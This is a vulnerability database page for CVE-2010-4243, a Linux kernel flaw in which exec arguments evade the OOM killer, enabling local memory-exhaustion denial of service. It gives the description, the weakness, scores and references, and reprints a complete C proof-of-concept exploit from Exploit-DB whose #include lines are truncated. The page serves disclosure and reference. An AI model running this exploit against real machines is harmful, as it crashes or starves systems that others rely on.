CVE-2010-4243 : Detail

CVE-2010-4243

0.04%V3
Local
2011-01-22 20:00 +00:00
2018-10-10 16:57 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

fs/exec.c in the Linux kernel before 2.6.37 does not enable the OOM Killer to assess use of stack memory by arrays representing the (1) arguments and (2) environment, which allows local users to cause a denial of service (memory consumption) via a crafted exec system call, aka an "OOM dodging issue," a related issue to CVE-2010-3858.

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-400 Uncontrolled Resource Consumption
The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.

Metrics

Metric Score Severity CVSS Vector Source
V2 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 15619

Publication date : 2010-11-25 23:00 +00:00
Author : Roland McGrath
EDB Verified : No

// source: https://www.securityfocus.com/bid/44301/info /* known for over a year, fixed in grsec bug is due to a bad limit on the max size of the stack for 32bit apps on a 64bit OS. Instead of them being limited to 1/4th of a 32bit address space, they're limited to 1/4th of a 64bit address space -- oops! in combination with vanilla ASLR, it triggers a BUG() as the stack tries to expand around the address space when shifted Below mmap_min_addr you say? uh oh! ;) Reported to Ted Tso in December 2009 Linus today (Aug 13 2010) silently fixes tangential issue: http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=320b2b8de12698082609ebbc1a17165727f4c893 The second bug here is that the memory usage explodes within the kernel from a single 128k allocation in userland The explosion of memory isn't accounted for by any task so it won't be terminated by the OOM killer curious what actual vuln was involved that they were trying to silently fix, as I don't think it's the one below clobbering data in a suid app by growing the stack into the mapping for the image? ;) I smell privesc...mumblings of X server/recursion ulimit -s unlimited ./64bit_dos SELinux is here to save us though with its fine-grained controls! Wait, it doesn't? Clearly the solution is to throw a buggy KVM on top of it Not enough? Ok, we'll throw in an extra SELinux, that'll really throw those hackers off when they use the same exact exploit on the host as they do on the guest! COMMON CRITERIA HERE I COME! */ #include #include #include #include #include #define NUM_ARGS 24550 int main(void) { char **args; char *str; int i; /* not needed, just makes it easier for machines with less RAM */ personality(PER_LINUX32_3GB); str = malloc(128 * 1024); memset(str, 'A', 128 * 1024 - 1); str[128 * 1024 - 1] = '\0'; args = malloc(NUM_ARGS * sizeof(char *)); for (i = 0; i < (NUM_ARGS - 1); i++) args[i] = str; args[i] = NULL; execv("/bin/sh", args); printf("execve failed\n"); return 0; }

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version To (excluding) 2.6.37

References

http://openwall.com/lists/oss-security/2010/11/22/6
Tags : mailing-list, x_refsource_MLIST
http://www.redhat.com/support/errata/RHSA-2011-0017.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/46397
Tags : third-party-advisory, x_refsource_SECUNIA
http://lkml.org/lkml/2010/8/30/378
Tags : mailing-list, x_refsource_MLIST
http://www.exploit-db.com/exploits/15619
Tags : exploit, x_refsource_EXPLOIT-DB
http://openwall.com/lists/oss-security/2010/11/22/15
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/42884
Tags : third-party-advisory, x_refsource_SECUNIA
http://lkml.org/lkml/2010/8/27/429
Tags : mailing-list, x_refsource_MLIST
http://lkml.org/lkml/2010/8/30/138
Tags : mailing-list, x_refsource_MLIST
http://lkml.org/lkml/2010/8/29/206
Tags : mailing-list, x_refsource_MLIST
http://www.securityfocus.com/bid/45004
Tags : vdb-entry, x_refsource_BID
Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.